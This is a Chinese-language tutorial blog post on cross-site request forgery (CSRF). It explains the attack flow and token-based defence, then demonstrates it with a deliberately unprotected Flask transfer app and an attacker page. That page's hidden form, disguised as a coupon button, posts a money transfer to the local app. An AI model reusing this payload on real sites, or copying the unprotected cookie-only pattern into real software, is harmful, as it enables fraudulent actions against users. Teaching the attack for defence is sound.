CSRF——跨站請求偽造
阿新 • • 發佈:2018-11-19
1、CSRF跨站請求偽造的流程
該過程存在三方:使用者客戶端、正常網站A、惡意攻擊網站B(前提存在CSRF漏洞)
1、使用者登陸了正常網站A輸入了相關的驗證資訊。
2、正常網站將cookie寫入瀏覽器,實現了狀態保持
3、使用者在未退出正常網站的情況下訪問了惡意網站
4、惡意網站指定了action=“正常網站的url”,偽造了請求引數。
5、使用者在主觀未知的情況下,再次訪問了正常網站,傳送了惡意網站偽造的請求引數。
注意: 惡意網址是不知道是誰訪問的它(通俗點和釣魚差不多),並且偽造的惡意請求是使用者自己傳送的。
2、跨站請求防護的實現
1、後端伺服器首先需要開發csrf保護,post、put、delect、patch,一般不會驗證get請求。
2、後端會生成csrf_token,存入到瀏覽器的cookie中,其次存入到表單中。
3、當用戶發起請求時,會自動攜帶cookie中的csrf_token,後端會比較cookie中和表單中的csrf_token值,
4、不一致,請求操作失敗。
3、程式碼演示
(1)未進行 csrf 校驗的 WebA
1>後端程式碼的實現
from flask import Flask, render_template, make_response
from flask import redirect
from flask import request
from flask import url_for
app = Flask(__name__)
@app.route('/', methods=["POST", "GET"])
def index():
if request.method == "POST":
# 取到表單中提交上來的引數
username = request.form.get("username")
password = request.form.get("password" )
if not all([username, password]):
print('引數錯誤')
else:
print(username, password)
if username == 'laowang' and password == '1234':
# 狀態保持,設定使用者名稱到cookie中表示登入成功
response = redirect(url_for('transfer'))
response.set_cookie('username', username)
return response
else:
print('密碼錯誤')
return render_template('temp_login.html')
@app.route('/transfer', methods=["POST", "GET"])
def transfer():
# 從cookie中取到使用者名稱
username = request.cookies.get('username', None)
# 如果沒有取到,代表沒有登入
if not username:
return redirect(url_for('index'))
if request.method == "POST":
to_account = request.form.get("to_account")
money = request.form.get("money")
print('假裝執行轉操作,將當前登入使用者的錢轉賬到指定賬戶')
return '轉賬 %s 元到 %s 成功' % (money, to_account)
# 渲染轉換頁面
response = make_response(render_template('temp_transfer.html'))
return response
if __name__ == '__main__':
app.run(debug=True, port=9000)
2>前端程式碼實現
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>登入</title>
</head>
<body>
<h1>我是網站A,登入頁面</h1>
<form method="post">
<label>使用者名稱:</label><input type="text" name="username" placeholder="請輸入使用者名稱"><br/>
<label>密碼:</label><input type="password" name="password" placeholder="請輸入密碼"><br/>
<input type="submit" value="登入">
</form>
</body>
</html>
3>前端轉賬頁面
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>轉賬</title>
</head>
<body>
<h1>我是網站A,轉賬頁面</h1>
<form method="post">
<label>賬戶:</label><input type="text" name="to_account" placeholder="請輸入要轉賬的賬戶"><br/>
<label>金額:</label><input type="number" name="money" placeholder="請輸入轉賬金額"><br/>
<input type="submit" value="轉賬">
</form>
</body>
</html>
(2)攻擊網站B的程式碼
1>後端程式碼
from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('temp_index.html')
if __name__ == '__main__':
app.run(debug=True, port=8000)
2>前端程式碼
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<h1>我是網站B</h1>
<form method="post" action="http://127.0.0.1:9000/transfer">
<input type="hidden" name="to_account" value="999999">
<input type="hidden" name="money" value="190000" hidden>
<input type="submit" value="點選領取優惠券">
</form>
</body>
</html>